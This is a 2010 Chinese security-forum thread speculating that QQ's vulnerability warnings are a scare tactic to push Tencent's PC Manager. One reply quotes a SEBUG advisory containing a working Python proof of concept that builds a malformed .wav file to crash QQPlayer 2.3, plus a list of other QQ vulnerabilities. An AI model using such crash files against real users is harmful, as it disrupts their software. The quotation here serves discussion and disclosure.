查看: 15426|回复: 139
收起左侧

[讨论] 囧……QQ什么时候变得这么强大了?

  [复制链接]
邪灵使者
头像被屏蔽
发表于 2010-9-20 22:32:55 | 显示全部楼层 |阅读模式
看图片。

win7系统,没安装电脑管家。问题是,它是怎么知道我系统有高危漏洞的?
  明明补丁都打了的说。
  无语啊无语。


ioage2008
发表于 2010-9-20 22:41:56 | 显示全部楼层
我敢肯定恶名昭彰的腾讯系列软件会窃取你的信息,并诱导你打上它给你提供的后门补丁,并监视你的一切上网行为。
founderchou
发表于 2010-9-20 22:43:48 | 显示全部楼层
补丁最好打官方的。。。第三方的太危险,尤其在天朝
黑暗王朝
发表于 2010-9-20 22:49:49 | 显示全部楼层
不会是恶意木马冒充的吧
三月惊蛰
发表于 2010-9-20 23:29:57 | 显示全部楼层

[:27:] 居然在卡饭看到熟人了

另外很正常,QQ版本不会内置了安全插件么
卧底小八路
发表于 2010-9-21 07:03:39 | 显示全部楼层
骗你装QQ电脑管家
Lgwu
头像被屏蔽
发表于 2010-9-21 07:12:15 | 显示全部楼层
本帖最后由 Lgwu 于 2010.9.21 07:21 编辑

QQ自身软件漏洞你确认都修复了? 随便拉一个漏洞,楼主认为第三方是否会出补丁呢?

QQ影音.wav文件解析拒绝服务漏洞SEBUG-ID:20106
SEBUG-Appdir:Tencent(腾讯)
发布时间:2010-09-07
影响版本:
Tencent QQ影音 2.3.696.400p1
漏洞描述:
BUGTRAQ  ID: 43033QQ影音是腾讯公司推出的一款支持任何格式影片和音乐文件的本地播放器。用户受骗使用QQ影音打开了畸形的.wav文件就会导致播放器崩溃。
<*参考
hadji samir (s-dz@hotmail.fr
*>
测试方法:
[www.sebug.net]
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

#!/usr/bin/python
####################################################
# Exploit Title:    QQPlayer 2.3.696.400p1(.wav) Denial of Service Vulnerability      
# Date:              07-09-2010                                                            
# Author:           Hadji Samir   , s-Dz[at]hotmail[dot]fr                                
# Software Link:  www.qq.com                                                            
# Version:           QQPlayer 2.3.696.400p1                                                
# Tested on:       Windows XP sp2                                                        
# CVE :                                                                                 
# Notes:             Working with filetype Mahboul-3lik.wav (.mp3,.3gp,.avi...)           
#                       Samir tjrs mahboul-3lik ...                                           #                                                                                                                              
###############################################################boom =("\x52\x49\x46\x46\x24\x80\x03\x20\x57\x41\x56\x45\x20")
buff = ("\x41" * 50000 )
wizz = open("Mahboul-3lik.wav","w")
wizz.write(boom + buff )
wizz.close()   

SEBUG安全建议:
厂商补丁:Tencent-------目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

QQ相关软件其它漏洞列表:

2010-09-09  QQ影音.wav文件解析拒绝服务漏洞
2010-08-24  QQ电脑管家TSKsp.sys驱动本地拒绝服务漏洞
2010-08-10  QQ Computer Manager TSKsp.sys Local Denial of Service Exploit
2010-07-27  QQPlayer smi File Buffer Overflow Exploit
2010-07-23  QQ影音ASX和CUE文件处理栈溢出漏洞
2010-05-11  QQ旋风下载链接处理缓冲区溢出漏洞
2010-02-19  Tencent QQ Doctor <= 3.2 ZwSetInformationFile Filter Kernel Mode D.O.S Vulnerability
2009-08-04  QQ2009 特殊字符拒绝服务漏洞
2007-01-03  QQ漏洞(远程可执行)
2008-07-08  QQ Mail跨站脚本漏洞
2007-11-30  腾讯QQ LaunchP2PShare远程栈溢出漏洞
2007-03-08  Tencent QQ GIF图形解析堆溢出漏洞
2007-02-14  Tencent QQ QQzone WebCtrl Activex空指针引用漏洞
2006-12-30  Tencent QQ SuperVideo Remote Denial of Service Vulnerability

elaphent
发表于 2010-9-21 08:14:36 | 显示全部楼层
whatever...
mf88267165
发表于 2010-9-21 08:20:10 | 显示全部楼层
诱导你安装qq管家
yiyuanchao
发表于 2010-9-21 10:09:21 | 显示全部楼层
牛。。。这样恐吓式的推广都tm学会了。。。。。。
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-12-25 12:48 , Processed in 0.125929 second(s), 18 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表